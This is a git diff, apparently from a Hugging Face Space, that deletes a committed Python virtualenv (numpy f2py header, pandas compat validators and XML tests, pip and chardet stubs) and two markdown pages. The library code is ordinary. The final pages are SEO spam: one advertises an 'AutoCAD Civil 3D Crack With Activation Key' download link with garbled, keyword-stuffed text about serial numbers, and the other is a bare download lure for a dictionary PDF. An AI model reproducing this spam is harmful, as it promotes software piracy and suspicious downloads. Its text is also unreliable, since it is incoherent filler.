16 : 1))) -#define F2PY_CHECK_ALIGNMENT(arr, intent) \ - ARRAY_ISALIGNED(arr, F2PY_GET_ALIGNMENT(intent)) -#define F2PY_ARRAY_IS_CHARACTER_COMPATIBLE(arr) ((PyArray_DESCR(arr)->type_num == NPY_STRING && PyArray_DESCR(arr)->elsize >= 1) \ - || PyArray_DESCR(arr)->type_num == NPY_UINT8) -#define F2PY_IS_UNICODE_ARRAY(arr) (PyArray_DESCR(arr)->type_num == NPY_UNICODE) - -extern PyArrayObject * -ndarray_from_pyobj(const int type_num, const int elsize_, npy_intp *dims, - const int rank, const int intent, PyObject *obj, - const char *errmess); - -extern PyArrayObject * -array_from_pyobj(const int type_num, npy_intp *dims, const int rank, - const int intent, PyObject *obj); -extern int -copy_ND_array(const PyArrayObject *in, PyArrayObject *out); - -#ifdef DEBUG_COPY_ND_ARRAY -extern void -dump_attrs(const PyArrayObject *arr); -#endif - - extern int f2py_describe(PyObject *obj, char *buf); - - /* Utility CPP macros and functions that can be used in signature file - expressions. See signature-file.rst for documentation. - */ - -#define f2py_itemsize(var) (PyArray_DESCR((capi_ ## var ## _as_array))->elsize) -#define f2py_size(var, ...) 
f2py_size_impl((PyArrayObject *)(capi_ ## var ## _as_array), ## __VA_ARGS__, -1) -#define f2py_rank(var) var ## _Rank -#define f2py_shape(var,dim) var ## _Dims[dim] -#define f2py_len(var) f2py_shape(var,0) -#define f2py_fshape(var,dim) f2py_shape(var,rank(var)-dim-1) -#define f2py_flen(var) f2py_fshape(var,0) -#define f2py_slen(var) capi_ ## var ## _len - - extern npy_intp f2py_size_impl(PyArrayObject* var, ...); - -#ifdef __cplusplus -} -#endif -#endif /* !Py_FORTRANOBJECT_H */ diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/compat/numpy/function.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/compat/numpy/function.py deleted file mode 100644 index a36e25a9df410aae54c11ee267532620b3855974..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/compat/numpy/function.py +++ /dev/null @@ -1,416 +0,0 @@ -""" -For compatibility with numpy libraries, pandas functions or methods have to -accept '*args' and '**kwargs' parameters to accommodate numpy arguments that -are not actually used or respected in the pandas implementation. - -To ensure that users do not abuse these parameters, validation is performed in -'validators.py' to make sure that any extra parameters passed correspond ONLY -to those in the numpy signature. Part of that validation includes whether or -not the user attempted to pass in non-default values for these extraneous -parameters. As we want to discourage users from relying on these parameters -when calling the pandas implementation, we want them only to pass in the -default values for these parameters. - -This module provides a set of commonly used default arguments for functions and -methods that are spread throughout the codebase. This module will make it -easier to adjust to future upstream changes in the analogous numpy signatures. 
-""" -from __future__ import annotations - -from typing import ( - TYPE_CHECKING, - Any, - TypeVar, - cast, - overload, -) - -import numpy as np -from numpy import ndarray - -from pandas._libs.lib import ( - is_bool, - is_integer, -) -from pandas.errors import UnsupportedFunctionCall -from pandas.util._validators import ( - validate_args, - validate_args_and_kwargs, - validate_kwargs, -) - -if TYPE_CHECKING: - from pandas._typing import ( - Axis, - AxisInt, - ) - - AxisNoneT = TypeVar("AxisNoneT", Axis, None) - - -class CompatValidator: - def __init__( - self, - defaults, - fname=None, - method: str | None = None, - max_fname_arg_count=None, - ) -> None: - self.fname = fname - self.method = method - self.defaults = defaults - self.max_fname_arg_count = max_fname_arg_count - - def __call__( - self, - args, - kwargs, - fname=None, - max_fname_arg_count=None, - method: str | None = None, - ) -> None: - if not args and not kwargs: - return None - - fname = self.fname if fname is None else fname - max_fname_arg_count = ( - self.max_fname_arg_count - if max_fname_arg_count is None - else max_fname_arg_count - ) - method = self.method if method is None else method - - if method == "args": - validate_args(fname, args, max_fname_arg_count, self.defaults) - elif method == "kwargs": - validate_kwargs(fname, kwargs, self.defaults) - elif method == "both": - validate_args_and_kwargs( - fname, args, kwargs, max_fname_arg_count, self.defaults - ) - else: - raise ValueError(f"invalid validation method '{method}'") - - -ARGMINMAX_DEFAULTS = {"out": None} -validate_argmin = CompatValidator( - ARGMINMAX_DEFAULTS, fname="argmin", method="both", max_fname_arg_count=1 -) -validate_argmax = CompatValidator( - ARGMINMAX_DEFAULTS, fname="argmax", method="both", max_fname_arg_count=1 -) - - -def process_skipna(skipna: bool | ndarray | None, args) -> tuple[bool, Any]: - if isinstance(skipna, ndarray) or skipna is None: - args = (skipna,) + args - skipna = True - - return skipna, args - - 
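The default-only validation pattern that the module docstring above describes can be sketched in isolation. The helper below is illustrative and not part of pandas; the real `CompatValidator` dispatches through `validate_args`/`validate_kwargs` and raises pandas-specific error types.

```python
# Standalone sketch of the CompatValidator idea: numpy-style keyword
# arguments are accepted for signature compatibility, but any value other
# than the recorded default is rejected. Illustrative only; this is not
# the pandas implementation.

def validate_numpy_kwargs(fname: str, kwargs: dict, defaults: dict) -> None:
    for key, value in kwargs.items():
        if key not in defaults:
            raise TypeError(
                f"{fname}() got an unexpected keyword argument '{key}'"
            )
        # Reject anything that is not the recorded default value.
        if value is not defaults[key] and value != defaults[key]:
            raise ValueError(
                f"the '{key}' parameter is not supported in the pandas "
                f"implementation of {fname}()"
            )

if __name__ == "__main__":
    # Default values pass silently; non-defaults raise.
    validate_numpy_kwargs("argmin", {"out": None}, {"out": None})
    try:
        validate_numpy_kwargs("argmin", {"out": []}, {"out": None})
    except ValueError as err:
        print(err)
```

This mirrors why the module insists on default-only extras: numpy passes `out=`, `dtype=`, etc. through `**kwargs`, and pandas only needs to verify they were left untouched.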
-def validate_argmin_with_skipna(skipna: bool | ndarray | None, args, kwargs) -> bool: - """ - If 'Series.argmin' is called via the 'numpy' library, the third parameter - in its signature is 'out', which takes either an ndarray or 'None', so - check if the 'skipna' parameter is either an instance of ndarray or is - None, since 'skipna' itself should be a boolean - """ - skipna, args = process_skipna(skipna, args) - validate_argmin(args, kwargs) - return skipna - - -def validate_argmax_with_skipna(skipna: bool | ndarray | None, args, kwargs) -> bool: - """ - If 'Series.argmax' is called via the 'numpy' library, the third parameter - in its signature is 'out', which takes either an ndarray or 'None', so - check if the 'skipna' parameter is either an instance of ndarray or is - None, since 'skipna' itself should be a boolean - """ - skipna, args = process_skipna(skipna, args) - validate_argmax(args, kwargs) - return skipna - - -ARGSORT_DEFAULTS: dict[str, int | str | None] = {} -ARGSORT_DEFAULTS["axis"] = -1 -ARGSORT_DEFAULTS["kind"] = "quicksort" -ARGSORT_DEFAULTS["order"] = None -ARGSORT_DEFAULTS["kind"] = None - - -validate_argsort = CompatValidator( - ARGSORT_DEFAULTS, fname="argsort", max_fname_arg_count=0, method="both" -) - -# two different signatures of argsort, this second validation for when the -# `kind` param is supported -ARGSORT_DEFAULTS_KIND: dict[str, int | None] = {} -ARGSORT_DEFAULTS_KIND["axis"] = -1 -ARGSORT_DEFAULTS_KIND["order"] = None -validate_argsort_kind = CompatValidator( - ARGSORT_DEFAULTS_KIND, fname="argsort", max_fname_arg_count=0, method="both" -) - - -def validate_argsort_with_ascending(ascending: bool | int | None, args, kwargs) -> bool: - """ - If 'Categorical.argsort' is called via the 'numpy' library, the first - parameter in its signature is 'axis', which takes either an integer or - 'None', so check if the 'ascending' parameter has either integer type or is - None, since 'ascending' itself should be a boolean - """ - if 
is_integer(ascending) or ascending is None: - args = (ascending,) + args - ascending = True - - validate_argsort_kind(args, kwargs, max_fname_arg_count=3) - ascending = cast(bool, ascending) - return ascending - - -CLIP_DEFAULTS: dict[str, Any] = {"out": None} -validate_clip = CompatValidator( - CLIP_DEFAULTS, fname="clip", method="both", max_fname_arg_count=3 -) - - -@overload -def validate_clip_with_axis(axis: ndarray, args, kwargs) -> None: - ... - - -@overload -def validate_clip_with_axis(axis: AxisNoneT, args, kwargs) -> AxisNoneT: - ... - - -def validate_clip_with_axis( - axis: ndarray | AxisNoneT, args, kwargs -) -> AxisNoneT | None: - """ - If 'NDFrame.clip' is called via the numpy library, the third parameter in - its signature is 'out', which can takes an ndarray, so check if the 'axis' - parameter is an instance of ndarray, since 'axis' itself should either be - an integer or None - """ - if isinstance(axis, ndarray): - args = (axis,) + args - # error: Incompatible types in assignment (expression has type "None", - # variable has type "Union[ndarray[Any, Any], str, int]") - axis = None # type: ignore[assignment] - - validate_clip(args, kwargs) - # error: Incompatible return value type (got "Union[ndarray[Any, Any], - # str, int]", expected "Union[str, int, None]") - return axis # type: ignore[return-value] - - -CUM_FUNC_DEFAULTS: dict[str, Any] = {} -CUM_FUNC_DEFAULTS["dtype"] = None -CUM_FUNC_DEFAULTS["out"] = None -validate_cum_func = CompatValidator( - CUM_FUNC_DEFAULTS, method="both", max_fname_arg_count=1 -) -validate_cumsum = CompatValidator( - CUM_FUNC_DEFAULTS, fname="cumsum", method="both", max_fname_arg_count=1 -) - - -def validate_cum_func_with_skipna(skipna: bool, args, kwargs, name) -> bool: - """ - If this function is called via the 'numpy' library, the third parameter in - its signature is 'dtype', which takes either a 'numpy' dtype or 'None', so - check if the 'skipna' parameter is a boolean or not - """ - if not is_bool(skipna): - args = 
(skipna,) + args - skipna = True - elif isinstance(skipna, np.bool_): - skipna = bool(skipna) - - validate_cum_func(args, kwargs, fname=name) - return skipna - - -ALLANY_DEFAULTS: dict[str, bool | None] = {} -ALLANY_DEFAULTS["dtype"] = None -ALLANY_DEFAULTS["out"] = None -ALLANY_DEFAULTS["keepdims"] = False -ALLANY_DEFAULTS["axis"] = None -validate_all = CompatValidator( - ALLANY_DEFAULTS, fname="all", method="both", max_fname_arg_count=1 -) -validate_any = CompatValidator( - ALLANY_DEFAULTS, fname="any", method="both", max_fname_arg_count=1 -) - -LOGICAL_FUNC_DEFAULTS = {"out": None, "keepdims": False} -validate_logical_func = CompatValidator(LOGICAL_FUNC_DEFAULTS, method="kwargs") - -MINMAX_DEFAULTS = {"axis": None, "dtype": None, "out": None, "keepdims": False} -validate_min = CompatValidator( - MINMAX_DEFAULTS, fname="min", method="both", max_fname_arg_count=1 -) -validate_max = CompatValidator( - MINMAX_DEFAULTS, fname="max", method="both", max_fname_arg_count=1 -) - -RESHAPE_DEFAULTS: dict[str, str] = {"order": "C"} -validate_reshape = CompatValidator( - RESHAPE_DEFAULTS, fname="reshape", method="both", max_fname_arg_count=1 -) - -REPEAT_DEFAULTS: dict[str, Any] = {"axis": None} -validate_repeat = CompatValidator( - REPEAT_DEFAULTS, fname="repeat", method="both", max_fname_arg_count=1 -) - -ROUND_DEFAULTS: dict[str, Any] = {"out": None} -validate_round = CompatValidator( - ROUND_DEFAULTS, fname="round", method="both", max_fname_arg_count=1 -) - -SORT_DEFAULTS: dict[str, int | str | None] = {} -SORT_DEFAULTS["axis"] = -1 -SORT_DEFAULTS["kind"] = "quicksort" -SORT_DEFAULTS["order"] = None -validate_sort = CompatValidator(SORT_DEFAULTS, fname="sort", method="kwargs") - -STAT_FUNC_DEFAULTS: dict[str, Any | None] = {} -STAT_FUNC_DEFAULTS["dtype"] = None -STAT_FUNC_DEFAULTS["out"] = None - -SUM_DEFAULTS = STAT_FUNC_DEFAULTS.copy() -SUM_DEFAULTS["axis"] = None -SUM_DEFAULTS["keepdims"] = False -SUM_DEFAULTS["initial"] = None - -PROD_DEFAULTS = SUM_DEFAULTS.copy() - 
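The positional-shift trick used by `process_skipna` and `validate_cum_func_with_skipna` above can be sketched standalone. The function name below is illustrative; the real code also treats `np.bool_` specially via `is_bool`, which plain `isinstance(..., bool)` does not cover.

```python
# Standalone sketch of the disambiguation trick: when numpy calls e.g.
# np.cumsum(series, axis, dtype, out), the value intended for a positional
# numpy parameter can land in the pandas 'skipna' slot. If 'skipna' is not
# actually a bool, it must be that misplaced positional argument, so it is
# pushed back onto args and 'skipna' is reset to its pandas default (True).

def shift_non_bool_skipna(skipna, args):
    if not isinstance(skipna, bool):
        args = (skipna,) + args  # hand the value back for positional validation
        skipna = True            # restore the pandas default
    return skipna, args
```

After the shift, the reassembled `args` tuple is run through the ordinary validator, so a non-default value still fails loudly instead of being silently swallowed.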
-MEAN_DEFAULTS = SUM_DEFAULTS.copy() - -MEDIAN_DEFAULTS = STAT_FUNC_DEFAULTS.copy() -MEDIAN_DEFAULTS["overwrite_input"] = False -MEDIAN_DEFAULTS["keepdims"] = False - -STAT_FUNC_DEFAULTS["keepdims"] = False - -validate_stat_func = CompatValidator(STAT_FUNC_DEFAULTS, method="kwargs") -validate_sum = CompatValidator( - SUM_DEFAULTS, fname="sum", method="both", max_fname_arg_count=1 -) -validate_prod = CompatValidator( - PROD_DEFAULTS, fname="prod", method="both", max_fname_arg_count=1 -) -validate_mean = CompatValidator( - MEAN_DEFAULTS, fname="mean", method="both", max_fname_arg_count=1 -) -validate_median = CompatValidator( - MEDIAN_DEFAULTS, fname="median", method="both", max_fname_arg_count=1 -) - -STAT_DDOF_FUNC_DEFAULTS: dict[str, bool | None] = {} -STAT_DDOF_FUNC_DEFAULTS["dtype"] = None -STAT_DDOF_FUNC_DEFAULTS["out"] = None -STAT_DDOF_FUNC_DEFAULTS["keepdims"] = False -validate_stat_ddof_func = CompatValidator(STAT_DDOF_FUNC_DEFAULTS, method="kwargs") - -TAKE_DEFAULTS: dict[str, str | None] = {} -TAKE_DEFAULTS["out"] = None -TAKE_DEFAULTS["mode"] = "raise" -validate_take = CompatValidator(TAKE_DEFAULTS, fname="take", method="kwargs") - - -def validate_take_with_convert(convert: ndarray | bool | None, args, kwargs) -> bool: - """ - If this function is called via the 'numpy' library, the third parameter in - its signature is 'axis', which takes either an ndarray or 'None', so check - if the 'convert' parameter is either an instance of ndarray or is None - """ - if isinstance(convert, ndarray) or convert is None: - args = (convert,) + args - convert = True - - validate_take(args, kwargs, max_fname_arg_count=3, method="both") - return convert - - -TRANSPOSE_DEFAULTS = {"axes": None} -validate_transpose = CompatValidator( - TRANSPOSE_DEFAULTS, fname="transpose", method="both", max_fname_arg_count=0 -) - - -def validate_groupby_func(name: str, args, kwargs, allowed=None) -> None: - """ - 'args' and 'kwargs' should be empty, except for allowed kwargs because all - 
of their necessary parameters are explicitly listed in the function - signature - """ - if allowed is None: - allowed = [] - - kwargs = set(kwargs) - set(allowed) - - if len(args) + len(kwargs) > 0: - raise UnsupportedFunctionCall( - "numpy operations are not valid with groupby. " - f"Use .groupby(...).{name}() instead" - ) - - -RESAMPLER_NUMPY_OPS = ("min", "max", "sum", "prod", "mean", "std", "var") - - -def validate_resampler_func(method: str, args, kwargs) -> None: - """ - 'args' and 'kwargs' should be empty because all of their necessary - parameters are explicitly listed in the function signature - """ - if len(args) + len(kwargs) > 0: - if method in RESAMPLER_NUMPY_OPS: - raise UnsupportedFunctionCall( - "numpy operations are not valid with resample. " - f"Use .resample(...).{method}() instead" - ) - raise TypeError("too many arguments passed in") - - -def validate_minmax_axis(axis: AxisInt | None, ndim: int = 1) -> None: - """ - Ensure that the axis argument passed to min, max, argmin, or argmax is zero - or None, as otherwise it will be incorrectly ignored. 
- - Parameters - ---------- - axis : int or None - ndim : int, default 1 - - Raises - ------ - ValueError - """ - if axis is None: - return - if axis >= ndim or (axis < 0 and ndim + axis < 0): - raise ValueError(f"`axis` must be fewer than the number of dimensions ({ndim})") - - -_validation_funcs = { - "median": validate_median, - "mean": validate_mean, - "min": validate_min, - "max": validate_max, - "sum": validate_sum, - "prod": validate_prod, -} - - -def validate_func(fname, args, kwargs) -> None: - if fname not in _validation_funcs: - return validate_stat_func(args, kwargs, fname=fname) - - validation_func = _validation_funcs[fname] - return validation_func(args, kwargs) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/io/xml/test_xml_dtypes.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/io/xml/test_xml_dtypes.py deleted file mode 100644 index fb24902efc0f52a67043762f2be51f19f5fa61cb..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pandas/tests/io/xml/test_xml_dtypes.py +++ /dev/null @@ -1,482 +0,0 @@ -from __future__ import annotations - -from io import StringIO - -import pytest - -from pandas.errors import ParserWarning -import pandas.util._test_decorators as td - -from pandas import ( - DataFrame, - Series, - to_datetime, -) -import pandas._testing as tm - -from pandas.io.xml import read_xml - - -@pytest.fixture(params=[pytest.param("lxml", marks=td.skip_if_no("lxml")), "etree"]) -def parser(request): - return request.param - - -@pytest.fixture( - params=[None, {"book": ["category", "title", "author", "year", "price"]}] -) -def iterparse(request): - return request.param - - -def read_xml_iterparse(data, **kwargs): - with tm.ensure_clean() as path: - with open(path, "w", encoding="utf-8") as f: - f.write(data) - return read_xml(path, **kwargs) - - -xml_types = """\ - - - - square - 00360 - 4.0 - - - circle - 00360 - - - - 
triangle - 00180 - 3.0 - -""" - -xml_dates = """ - - - square - 00360 - 4.0 - 2020-01-01 - - - circle - 00360 - - 2021-01-01 - - - triangle - 00180 - 3.0 - 2022-01-01 - -""" - - -# DTYPE - - -def test_dtype_single_str(parser): - df_result = read_xml(StringIO(xml_types), dtype={"degrees": "str"}, parser=parser) - df_iter = read_xml_iterparse( - xml_types, - parser=parser, - dtype={"degrees": "str"}, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": ["00360", "00360", "00180"], - "sides": [4.0, float("nan"), 3.0], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_dtypes_all_str(parser): - df_result = read_xml(StringIO(xml_dates), dtype="string", parser=parser) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - dtype="string", - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": ["00360", "00360", "00180"], - "sides": ["4.0", None, "3.0"], - "date": ["2020-01-01", "2021-01-01", "2022-01-01"], - }, - dtype="string", - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_dtypes_with_names(parser): - df_result = read_xml( - StringIO(xml_dates), - names=["Col1", "Col2", "Col3", "Col4"], - dtype={"Col2": "string", "Col3": "Int64", "Col4": "datetime64[ns]"}, - parser=parser, - ) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - names=["Col1", "Col2", "Col3", "Col4"], - dtype={"Col2": "string", "Col3": "Int64", "Col4": "datetime64[ns]"}, - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "Col1": ["square", "circle", "triangle"], - "Col2": Series(["00360", "00360", "00180"]).astype("string"), - "Col3": Series([4.0, float("nan"), 3.0]).astype("Int64"), - "Col4": 
to_datetime(["2020-01-01", "2021-01-01", "2022-01-01"]), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_dtype_nullable_int(parser): - df_result = read_xml(StringIO(xml_types), dtype={"sides": "Int64"}, parser=parser) - df_iter = read_xml_iterparse( - xml_types, - parser=parser, - dtype={"sides": "Int64"}, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": Series([4.0, float("nan"), 3.0]).astype("Int64"), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_dtype_float(parser): - df_result = read_xml(StringIO(xml_types), dtype={"degrees": "float"}, parser=parser) - df_iter = read_xml_iterparse( - xml_types, - parser=parser, - dtype={"degrees": "float"}, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": Series([360, 360, 180]).astype("float"), - "sides": [4.0, float("nan"), 3.0], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_wrong_dtype(xml_books, parser, iterparse): - with pytest.raises( - ValueError, match=('Unable to parse string "Everyday Italian" at position 0') - ): - read_xml( - xml_books, dtype={"title": "Int64"}, parser=parser, iterparse=iterparse - ) - - -def test_both_dtype_converters(parser): - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": ["00360", "00360", "00180"], - "sides": [4.0, float("nan"), 3.0], - } - ) - - with tm.assert_produces_warning(ParserWarning, match="Both a converter and dtype"): - df_result = read_xml( - StringIO(xml_types), - dtype={"degrees": "str"}, - converters={"degrees": str}, - parser=parser, - ) - df_iter = read_xml_iterparse( - xml_types, - dtype={"degrees": "str"}, 
- converters={"degrees": str}, - parser=parser, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -# CONVERTERS - - -def test_converters_str(parser): - df_result = read_xml( - StringIO(xml_types), converters={"degrees": str}, parser=parser - ) - df_iter = read_xml_iterparse( - xml_types, - parser=parser, - converters={"degrees": str}, - iterparse={"row": ["shape", "degrees", "sides"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": ["00360", "00360", "00180"], - "sides": [4.0, float("nan"), 3.0], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_converters_date(parser): - convert_to_datetime = lambda x: to_datetime(x) - df_result = read_xml( - StringIO(xml_dates), converters={"date": convert_to_datetime}, parser=parser - ) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - converters={"date": convert_to_datetime}, - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": to_datetime(["2020-01-01", "2021-01-01", "2022-01-01"]), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_wrong_converters_type(xml_books, parser, iterparse): - with pytest.raises(TypeError, match=("Type converters must be a dict or subclass")): - read_xml( - xml_books, converters={"year", str}, parser=parser, iterparse=iterparse - ) - - -def test_callable_func_converters(xml_books, parser, iterparse): - with pytest.raises(TypeError, match=("'float' object is not callable")): - read_xml( - xml_books, converters={"year": float()}, parser=parser, iterparse=iterparse - ) - - -def test_callable_str_converters(xml_books, parser, iterparse): - with 
pytest.raises(TypeError, match=("'str' object is not callable")): - read_xml( - xml_books, converters={"year": "float"}, parser=parser, iterparse=iterparse - ) - - -# PARSE DATES - - -def test_parse_dates_column_name(parser): - df_result = read_xml(StringIO(xml_dates), parse_dates=["date"], parser=parser) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - parse_dates=["date"], - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": to_datetime(["2020-01-01", "2021-01-01", "2022-01-01"]), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_parse_dates_column_index(parser): - df_result = read_xml(StringIO(xml_dates), parse_dates=[3], parser=parser) - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - parse_dates=[3], - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": to_datetime(["2020-01-01", "2021-01-01", "2022-01-01"]), - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_parse_dates_true(parser): - df_result = read_xml(StringIO(xml_dates), parse_dates=True, parser=parser) - - df_iter = read_xml_iterparse( - xml_dates, - parser=parser, - parse_dates=True, - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": ["2020-01-01", "2021-01-01", "2022-01-01"], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_parse_dates_dictionary(parser): - xml = """ - - - square - 
360 - 4.0 - 2020 - 12 - 31 - - - circle - 360 - - 2021 - 12 - 31 - - - triangle - 180 - 3.0 - 2022 - 12 - 31 - -""" - - df_result = read_xml( - StringIO(xml), parse_dates={"date_end": ["year", "month", "day"]}, parser=parser - ) - df_iter = read_xml_iterparse( - xml, - parser=parser, - parse_dates={"date_end": ["year", "month", "day"]}, - iterparse={"row": ["shape", "degrees", "sides", "year", "month", "day"]}, - ) - - df_expected = DataFrame( - { - "date_end": to_datetime(["2020-12-31", "2021-12-31", "2022-12-31"]), - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - } - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_day_first_parse_dates(parser): - xml = """\ - - - - square - 00360 - 4.0 - 31/12/2020 - - - circle - 00360 - - 31/12/2021 - - - triangle - 00180 - 3.0 - 31/12/2022 - -""" - - df_expected = DataFrame( - { - "shape": ["square", "circle", "triangle"], - "degrees": [360, 360, 180], - "sides": [4.0, float("nan"), 3.0], - "date": to_datetime(["2020-12-31", "2021-12-31", "2022-12-31"]), - } - ) - - with tm.assert_produces_warning( - UserWarning, match="Parsing dates in %d/%m/%Y format" - ): - df_result = read_xml(StringIO(xml), parse_dates=["date"], parser=parser) - df_iter = read_xml_iterparse( - xml, - parse_dates=["date"], - parser=parser, - iterparse={"row": ["shape", "degrees", "sides", "date"]}, - ) - - tm.assert_frame_equal(df_result, df_expected) - tm.assert_frame_equal(df_iter, df_expected) - - -def test_wrong_parse_dates_type(xml_books, parser, iterparse): - with pytest.raises( - TypeError, match=("Only booleans, lists, and dictionaries are accepted") - ): - read_xml(xml_books, parse_dates={"date"}, parser=parser, iterparse=iterparse) diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/operations/install/__init__.py 
b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/operations/install/__init__.py deleted file mode 100644 index 24d6a5dd31fe33b03f90ed0f9ee465253686900c..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_internal/operations/install/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -"""For modules related to installing packages. -""" diff --git a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/chardet/compat.py b/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/chardet/compat.py deleted file mode 100644 index 8941572b3e6a2a2267659ed74e25099c37aae90b..0000000000000000000000000000000000000000 --- a/spaces/profayle/TerrapinTalk/myenv/lib/python3.9/site-packages/pip/_vendor/chardet/compat.py +++ /dev/null @@ -1,36 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# Contributor(s): -# Dan Blanchard -# Ian Cordasco -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. 
-# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import sys - - -if sys.version_info < (3, 0): - PY2 = True - PY3 = False - string_types = (str, unicode) - text_type = unicode - iteritems = dict.iteritems -else: - PY2 = False - PY3 = True - string_types = (bytes, str) - text_type = str - iteritems = dict.items diff --git a/spaces/quidiaMuxgu/Expedit-SAM/Autodesk AutoCAD Civil 3D Crack With Activation Key _VERIFIED_.md b/spaces/quidiaMuxgu/Expedit-SAM/Autodesk AutoCAD Civil 3D Crack With Activation Key _VERIFIED_.md deleted file mode 100644 index 1f3a9be73a8f89d1bbace7e46461da789f3bcca3..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/Autodesk AutoCAD Civil 3D Crack With Activation Key _VERIFIED_.md +++ /dev/null @@ -1,11 +0,0 @@ -

    Autodesk AutoCAD Civil 3D Crack With Activation Key


    DOWNLOAD ✔✔✔ https://geags.com/2uCqHy



    -
    -Dec 2, 2021 - This application can also optimize the data flow between ArcGIS, Autodesk Autocad Civil 3D serial number and ArcGIS. You can perform simple ... Dec 4, 2019 - Autodesk autocad civil 3d serial number. -Autodesk autocad civil 3d serial number. -Autocad civil 3d serial. -Autocad 3d civil 3d 2012 serial number Autodesk AutoCAD civil 3d serial number is the most current software which contains the professional. -Autodesk Autocad 2013 Civil 3D serial number is the most current software which contains the professional. -Autodesk autocad 2013 civil 3d serial numbers are available for download for free. 8a78ff9644
    -
    -
    -

    diff --git a/spaces/quidiaMuxgu/Expedit-SAM/Dictionarul General Al Literaturii Romane Pdf Download !!EXCLUSIVE!!.md b/spaces/quidiaMuxgu/Expedit-SAM/Dictionarul General Al Literaturii Romane Pdf Download !!EXCLUSIVE!!.md deleted file mode 100644 index 67128b1d7967a67f513537f24eca38f785002beb..0000000000000000000000000000000000000000 --- a/spaces/quidiaMuxgu/Expedit-SAM/Dictionarul General Al Literaturii Romane Pdf Download !!EXCLUSIVE!!.md +++ /dev/null @@ -1,9 +0,0 @@ - -


    -


    -

    dictionarul general al literaturii romane pdf download


    DOWNLOAD ✫✫✫ https://geags.com/2uCs4R



    -

